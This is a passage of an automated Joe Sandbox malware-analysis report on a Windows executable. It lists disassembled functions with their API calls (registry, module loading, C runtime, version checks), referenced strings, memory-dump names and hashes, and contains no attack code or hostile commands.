Opcode ID: c1c6632dd2198c4fa8ca8a2e3ebf64091886599935ba637f50058a7965a18686
Instruction ID: 546f3bc04c3996caba5279dcfbe3c96beef278b53374e158a2bccfd495661ab1
Opcode Fuzzy Hash: c1c6632dd2198c4fa8ca8a2e3ebf64091886599935ba637f50058a7965a18686
Instruction Fuzzy Hash: F4D1AEB1D042589FCF15CFA8C8809EDBBB5FF4A314F28416AE455FB242D731A946DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F9C4AC Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00F9C4A3,00F9B3E4), ref: 00F9C4BA
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F9C4C8
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F9C4E1
SetLastError.KERNEL32(00000000,?,00F9C4A3,00F9B3E4), ref: 00F9C533

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 9951ab668856dd6193b201385e065a8fe7c56b7f478f40607ad761afc26bd306
Instruction ID: fa37b9e363fcfcd22e61b8fbe25cf86505ce5223615b70ea56196b5d6c6d009b
Opcode Fuzzy Hash: 9951ab668856dd6193b201385e065a8fe7c56b7f478f40607ad761afc26bd306
Instruction Fuzzy Hash: D101F773A18319AEBE243FB87C856363E98DB067B8775032AF510850F6EF155C01B691

Uniqueness

Uniqueness Score: -1.00%

Function 00F9798F Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 165COMMON

Download Yara Rule

APIs

Part of subcall function 00F91BDC: InitializeCriticalSectionEx.KERNEL32(00000010,00000000,00000000,00000000,00F975A3,?,00000000,00F97410), ref: 00F91BE2
Part of subcall function 00F91BDC: GetLastError.KERNEL32 ref: 00F91BEC

GetModuleFileNameW.KERNEL32(00F90000,?,00000104), ref: 00F97A4C
GetModuleHandleW.KERNEL32(00000000), ref: 00F97AA0

Strings

Module_Raw, xrefs: 00F97B51
Module, xrefs: 00F97B31
REGISTRY, xrefs: 00F97B7F

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: Module$CriticalErrorFileHandleInitializeLastNameSection
String ID: Module$Module_Raw$REGISTRY
API String ID: 3798416324-549000027
Opcode ID: b009e5fe1ae4f4d873b1df795ef6a8e9bdfa0c8167570ea76aded4a0958e8dde
Instruction ID: 52f8e57efe00a38ddb74e12ff6e87703aea667a4a5e2003871c10a10d58b9ba1
Opcode Fuzzy Hash: b009e5fe1ae4f4d873b1df795ef6a8e9bdfa0c8167570ea76aded4a0958e8dde
Instruction Fuzzy Hash: C551C771A143189BEF24EB64CC40AEE73B8AF45310F0440A9E906A7551EB39AF84EF51

Uniqueness

Uniqueness Score: -1.00%

Function 00F91D9C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,?,00F91E33,00000000,00020019,?,?,00000000,?,?,?,?,?,00F91195), ref: 00F91DAE
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00F91DBE
RegOpenKeyExW.ADVAPI32(00000000,00020019,00000000,80000002,00F91195,?,?,?,00F91E33,00000000,00020019,?,?,00000000), ref: 00F91DEE

Strings

Advapi32.dll, xrefs: 00F91DA9
RegOpenKeyTransactedW, xrefs: 00F91DB8

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AddressHandleModuleOpenProc
String ID: Advapi32.dll$RegOpenKeyTransactedW
API String ID: 1337834000-3913318428
Opcode ID: a65505c04350bc0b0fa2d5f2a767aac90d6b71d5602ad4d1c5462c640d1b4fcf
Instruction ID: 6508d1bbdf06bfc293b44972a082d4813e80cb090d1c86f83c8ab5b4ac84ac54
Opcode Fuzzy Hash: a65505c04350bc0b0fa2d5f2a767aac90d6b71d5602ad4d1c5462c640d1b4fcf
Instruction Fuzzy Hash: A0F04F3691010ABB9F211FA6EC04D9B7F79FF86B91B00443AFA4590120CB32C961FB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F91A3F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(comctl32.dll,?,00000001,?,?,00F91816,00000000), ref: 00F91A5D
GetProcAddress.KERNEL32(00000000,TaskDialogIndirect), ref: 00F91A6F
FreeLibrary.KERNEL32(00000000,?,00000001,?,?,00F91816,00000000), ref: 00F91A86

Strings

comctl32.dll, xrefs: 00F91A53
TaskDialogIndirect, xrefs: 00F91A69

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: TaskDialogIndirect$comctl32.dll
API String ID: 145871493-2809879075
Opcode ID: d9b35fcc38b0fb45f14645a6cb30fb2e81de0ae2eedc5b3a914dd917b4955840
Instruction ID: ac7f1d0d57d46b864b6dbcceb11d17b7bc9e87cdf8c726c8dd78993809806ca2
Opcode Fuzzy Hash: d9b35fcc38b0fb45f14645a6cb30fb2e81de0ae2eedc5b3a914dd917b4955840
Instruction Fuzzy Hash: C8F0E231B0261ABBE7205B659C44BAABBA8EF46B60F008135F918C6241C7B8DC04A6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00FA15C6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00FA15BB,?,?,00FA1583,?,E9800040,?), ref: 00FA15DB
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FA15EE
FreeLibrary.KERNEL32(00000000,?,?,00FA15BB,?,?,00FA1583,?,E9800040,?), ref: 00FA1611

Strings

mscoree.dll, xrefs: 00FA15D4
CorExitProcess, xrefs: 00FA15E6

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0635f40c8e3963c7299e9838c8e3454a331ce6245db98c4b379a3748dbc902d3
Instruction ID: 49eabb1c9a32ad5a992fe825f12871f04eaff5d1a01eeb1bb22369ca265ea60a
Opcode Fuzzy Hash: 0635f40c8e3963c7299e9838c8e3454a331ce6245db98c4b379a3748dbc902d3
Instruction Fuzzy Hash: 83F05E71901218FBDB21AB91DD09BEEBA68EF02762F054061A844E6260CB318E04FA95

Uniqueness

Uniqueness Score: -1.00%

Function 00FA1D33 Relevance: 7.6, APIs: 5, Instructions: 120COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00FA1DA1
_free.LIBCMT ref: 00FA1DC1
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00FA1E22
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00FA1E34
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00FA1E41

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: __crt_fast_encode_pointer$_free
String ID:
API String ID: 366466260-0
Opcode ID: 4990d8ac3a138193c5007fa1539c262215aecbd93a144a6a6e30e57f3e331a11
Instruction ID: e1bbd0cd8deab74f8a0f5c20fc1c86b387ee63874932074906cf989e16fb5414
Opcode Fuzzy Hash: 4990d8ac3a138193c5007fa1539c262215aecbd93a144a6a6e30e57f3e331a11
Instruction Fuzzy Hash: 3541C3B6E00204AFDB10DF68C890A5DB7B6FF8A724F1641A8E905EB351DB31BD01DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00FA6CB4 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00FA6CCC

Part of subcall function 00FA363A: HeapFree.KERNEL32(00000000,00000000,?,00FA6D47,?,00000000,?,00000000,?,00FA6D6E,?,00000007,?,?,00FA71E8,?), ref: 00FA3650
Part of subcall function 00FA363A: GetLastError.KERNEL32(?,?,00FA6D47,?,00000000,?,00000000,?,00FA6D6E,?,00000007,?,?,00FA71E8,?,?), ref: 00FA3662

_free.LIBCMT ref: 00FA6CDE
_free.LIBCMT ref: 00FA6CF0
_free.LIBCMT ref: 00FA6D02
_free.LIBCMT ref: 00FA6D14

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6f0144f69d9ef50f18a93202d40ebf42f2fd6316868f5fe77344cc48495d1204
Instruction ID: ab3f49a3b288904c716667fe162210edf22735c9010ceeb1305df70b5676d7fb
Opcode Fuzzy Hash: 6f0144f69d9ef50f18a93202d40ebf42f2fd6316868f5fe77344cc48495d1204
Instruction Fuzzy Hash: 4CF0FFB2A04644BBC621DB58EAC1C1673E9FB027657798805F049DB641CA38FC817A68

Uniqueness

Uniqueness Score: -1.00%

Function 00FA169A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\0923840932020004-3-0.exe, xrefs: 00FA16D8, 00FA16DF, 00FA1713

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\0923840932020004-3-0.exe
API String ID: 0-4284346557
Opcode ID: 3632aebc522134420ca508b769d81964540bb40c97f51ca6edd2ddb8b3642e62
Instruction ID: 283891f97bd8b97424ae02a5af7e29c1d8b67dc6b5e56123516f3a8b374f642c
Opcode Fuzzy Hash: 3632aebc522134420ca508b769d81964540bb40c97f51ca6edd2ddb8b3642e62
Instruction Fuzzy Hash: 67415FB5E00218ABDB21DF99DC85DAEBBB8FB86710F254166F804D7311EBB54A40EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F98399 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,?,?,00F990C5,?,?), ref: 00F983CC
GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 00F983DC

Strings

RegCreateKeyTransactedW, xrefs: 00F983D6
Advapi32.dll, xrefs: 00F983C7

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegCreateKeyTransactedW
API String ID: 1646373207-2994018265
Opcode ID: ee05b4cb2c5fb05165573bb044b5b9a470a0fd0231f0f37115f5290343d6090c
Instruction ID: 5217322014b1a97d30e054296ac209fedada53cd90a6d4fbcf2f37fd3cc744e6
Opcode Fuzzy Hash: ee05b4cb2c5fb05165573bb044b5b9a470a0fd0231f0f37115f5290343d6090c
Instruction Fuzzy Hash: BE2142B1A0020ABFEF14DFA9DC45EBBB7B8EFC5750B04C42DB51696141DB309915EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F918D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,00F9182D,00000000), ref: 00F9190C
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,00F9182D,00000000), ref: 00F91913
CloseHandle.KERNEL32(?), ref: 00F91950

Strings

SeShutdownPrivilege, xrefs: 00F918ED

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: Process$CloseCurrentHandleOpenToken
String ID: SeShutdownPrivilege
API String ID: 4052875653-3733053543
Opcode ID: 6800bb5076ae338d4bc3d7abdf70f97f332c5de41f31bfeae48776f86852f481
Instruction ID: 4e59233edc075782db31d75e54a748b399fc8c858064f08931d7d14adf254fb2
Opcode Fuzzy Hash: 6800bb5076ae338d4bc3d7abdf70f97f332c5de41f31bfeae48776f86852f481
Instruction Fuzzy Hash: CD111CB1A0021DABEF109FA5DC49AEFBBBCFF09750F004125E505E6150DB759A44EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F98BA7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,00000000,?,00F992D5,?,?,?,?), ref: 00F98BCE
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F98BDE

Part of subcall function 00F98B55: GetModuleHandleW.KERNEL32(Advapi32.dll,00000000,?,?,00F98BBE,?,?,00000000,?,00F992D5,?,?,?,?), ref: 00F98B67
Part of subcall function 00F98B55: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 00F98B77

Strings

Advapi32.dll, xrefs: 00F98BC9
RegDeleteKeyExW, xrefs: 00F98BD8

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegDeleteKeyExW
API String ID: 1646373207-2191092095
Opcode ID: 942c22dee123625ea6c8d0154a115184a8d7dc21532b1227a6cc1551381a723c
Instruction ID: 3f34f5185fc475ada3ca3a5834b4692f66f44597b7b841946bd01c28f7dbecda
Opcode Fuzzy Hash: 942c22dee123625ea6c8d0154a115184a8d7dc21532b1227a6cc1551381a723c
Instruction Fuzzy Hash: 6501ADB5508208EFEF216F59EC80F953FE8AF46390F084418F44592031CBB6D452BFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00F98B55 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,00000000,?,?,00F98BBE,?,?,00000000,?,00F992D5,?,?,?,?), ref: 00F98B67
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 00F98B77

Strings

RegDeleteKeyTransactedW, xrefs: 00F98B71
Advapi32.dll, xrefs: 00F98B62

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegDeleteKeyTransactedW
API String ID: 1646373207-2168864297
Opcode ID: 6beb0afb43f009fc6f36548b3fd4a562187b34d0b6b3333c9bacfdafb07e1783
Instruction ID: f30946d1666a1de3d5c3200fcc10df000745d97acfb862cea0ae02c8c2a2e3f2
Opcode Fuzzy Hash: 6beb0afb43f009fc6f36548b3fd4a562187b34d0b6b3333c9bacfdafb07e1783
Instruction Fuzzy Hash: 2CF08972A00344BAAB305F9AEC04D5777ADEFC7BA1314403AF645C1010DA72C452FB65

Uniqueness

Uniqueness Score: -1.00%

Function 00FA3AC9 Relevance: 6.3, APIs: 4, Instructions: 321COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00FA3B50

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 624037b9a350189cbc0158d12b8182e3428092ffb4cf89090a1db81f317a807e
Instruction ID: d34303f5aa4929aa56f32cbd618454b35ca9b7e82e9e2192e1594f379dab9594
Opcode Fuzzy Hash: 624037b9a350189cbc0158d12b8182e3428092ffb4cf89090a1db81f317a807e
Instruction Fuzzy Hash: 8CB127B2E002599FDB15CF28CC817AEBBF5EF56360F14416AF855EB241D6389E01EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F923D9 Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00F923E3
GetModuleHandleW.KERNEL32(00000000,00000820,00F973A5,--checkInstall,?), ref: 00F923EB
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00F923FE
_wcsrchr.LIBVCRUNTIME ref: 00F9242D

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: Module$FileH_prolog3_HandleName_wcsrchr
String ID:
API String ID: 3248668939-0
Opcode ID: 56f89933489922c2130e1997f2ada826ed892227cd860d1370d643bd0211a4e4
Instruction ID: 4ac73034ba2bb8a90f54fd9aeecec241e3b2310ab5765a9234746d685d767479
Opcode Fuzzy Hash: 56f89933489922c2130e1997f2ada826ed892227cd860d1370d643bd0211a4e4
Instruction Fuzzy Hash: 8951F27690011AAEDF64EF64CC95AEAB3B5FF54304F448294E48A67151EF306E85DFC0

Uniqueness

Uniqueness Score: -1.00%

Function 00FA31D2 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00F9179A,?,00F9EBD7,00F9179A,?,?,?,00F9EC92,E9800040), ref: 00FA31D7
_free.LIBCMT ref: 00FA3234
_free.LIBCMT ref: 00FA326A
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00F9EC92,E9800040), ref: 00FA3275

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: b3fcc66b8c41cc2cfb9b8573ecf97424f49498740fe41ba392822a3313dad54f
Instruction ID: 75a1fe366c1feb6aca7037effc981888e4036717abe9f9d757a8a32af4509264
Opcode Fuzzy Hash: b3fcc66b8c41cc2cfb9b8573ecf97424f49498740fe41ba392822a3313dad54f
Instruction Fuzzy Hash: E51125F66042057AC7617AB89CC6F2B36DDEBC3374B250224F135862E2DE788D007920

Uniqueness

Uniqueness Score: -1.00%

Function 00FA3329 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00000000,00F9E161,00FA36B7,?,?,00F9A662,?,?,00F9218D,00000000,0000000C,00F922E6,00000000), ref: 00FA332E
_free.LIBCMT ref: 00FA338B
_free.LIBCMT ref: 00FA33C1
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00000000,00F9E161,00FA36B7,?,?,00F9A662,?,?,00F9218D,00000000,0000000C), ref: 00FA33CC

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: b8511b6a855a316139270d668cdf1b2464fd381bdc996db2e337440d8e531a4b
Instruction ID: 99a10270cec0d7d981c42c8b605e2c90e7882b4d063bccbfe06b516c0f0607ff
Opcode Fuzzy Hash: b8511b6a855a316139270d668cdf1b2464fd381bdc996db2e337440d8e531a4b
Instruction Fuzzy Hash: 8E11E5F66483057FCB513AB99CC6E2B369DEBC3374B250234F225822D2DF698D057921

Uniqueness

Uniqueness Score: -1.00%

Function 00F92304 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003), ref: 00F92373
VerSetConditionMask.KERNEL32(00000000), ref: 00F92377
VerSetConditionMask.KERNEL32(00000000), ref: 00F9237B
VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00F9239E

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersion
String ID:
API String ID: 2793162063-0
Opcode ID: 50ef4de01a69ed2b25747b0af3f7723efcbad24c187010945e7d86a9be4e321f
Instruction ID: c6d78d4a7ae3b6faa650d6afcd46545e70dffaa02d8c3821433227f04f1ce217
Opcode Fuzzy Hash: 50ef4de01a69ed2b25747b0af3f7723efcbad24c187010945e7d86a9be4e321f
Instruction Fuzzy Hash: 24110070E4021CAAEB359F569C06FDFBBBCEF85700F00409AA508A6191D6B44B459F95

Uniqueness

Uniqueness Score: -1.00%

